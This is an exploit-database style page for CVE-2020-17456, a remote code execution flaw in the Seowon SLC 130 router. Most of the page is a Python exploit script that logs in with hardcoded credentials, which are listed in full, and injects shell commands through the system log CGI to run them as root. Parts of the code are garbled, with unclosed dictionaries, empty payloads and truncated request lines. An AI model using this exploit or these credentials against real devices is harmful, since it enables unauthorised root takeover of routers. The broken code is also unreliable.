Seowon slc 130 router remote code execution Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-08-21 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Seowon slc 130 router remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website:
# Date: 2020-08-20
# Vendor Homepage:
# Software Link:
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec
# Description:
# user can run arbitrary commands on the router as root !
# as there are already some hardcoded credentials so there is an easy to trigger exploit
# credentials :
# user => VIP
# pwd => V!P83869000
# user => Root
# pwd => PWDd0N~WH*4G#DN
# user => root
# pwd => gksrmf28
# user => admin
# pwd => admin
# A write-up can be found at:
import requests
import sys
host = sys.argv[1]
session = requests.Session()
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "pplication/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "",
"Connection": "close",
"Referer": "",
"Upgrade-Insecure-Requests": "1"
datas = {
#auth"/cgi-bin/login.cgi" , headers=header , data = datas)
cmd = sys.argv[2]
rce_data = {
rce ="/cgi-bin/system_log.cgi" , headers=header , data = rce_data)
print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])